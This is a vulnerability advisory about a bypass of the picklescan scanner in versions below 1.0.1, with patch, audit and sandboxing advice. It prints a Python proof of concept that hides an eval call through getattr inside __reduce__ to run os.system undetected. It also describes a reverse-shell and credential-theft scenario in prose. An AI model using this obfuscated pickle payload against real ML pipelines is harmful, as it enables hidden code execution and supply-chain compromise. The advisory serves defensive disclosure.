picklescan — a tool widely deployed to gate ML model loading from untrusted sources — can be bypassed with a public one-liner that uses getattr obfuscation to hide eval calls. Any MLOps pipeline or model-serving infrastructure that relies on picklescan as a security control is effectively unprotected against malicious pickle artifacts. Upgrade to picklescan >= 1.0.1 immediately and treat all pickle files previously cleared by older versions from external sources as potentially compromised.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 1.0.1 | 1.0.1 |
Do you use picklescan? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH: Upgrade picklescan to >= 1.0.1 immediately (pip install --upgrade picklescan). 2. AUDIT: Re-scan all pickle files previously approved by picklescan < 1.0.1 from external sources — treat them as untrusted until re-verified. 3. SAFE FORMATS: Prefer safetensors, ONNX, or JSON over pickle for model serialization wherever possible — eliminate the attack surface entirely. 4. SANDBOXING: Load any pickle files in isolated containers with no network egress, minimal filesystem access, and resource limits, even after scanning. 5. DETECTION: Monitor for unexpected child process spawning (os.system, subprocess) from Python processes involved in model loading. 6. DEFENSE IN DEPTH: Do not rely solely on any single scanner; combine hash verification, code signing, and allowlisting for model artifacts from external registries.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
### Summary An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source. ### Details It's possible to hide the `eval` call nested under another callable via `getattr`. ### PoC ```python import builtins class EvilClass: @staticmethod def _obfuscated_eval(payload): getattr(builtins, "eval")(payload) def __reduce__(self): payload = "__import__('os').system('echo \"successful attack\"')" return self._obfuscated_eval, (payload,) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files to system that load serialized ML models, APIs, or saved Python objects from untrusted sources.
Exploitation Scenario
An adversary targets an MLOps platform that automatically pulls and benchmarks community-submitted models. They craft a malicious pickle file embedding a reverse shell via getattr obfuscation — the file passes picklescan inspection cleanly on pre-patch versions. The file is published to a public model hub or submitted as a model artifact via a pull request. When the automated evaluation pipeline loads the model for scoring, the payload executes with the privileges of the inference worker. The adversary gains shell access to the training infrastructure, from which they can exfiltrate training data, poison the model registry, harvest cloud credentials from environment variables, or persist access. No human interaction is required after initial artifact submission.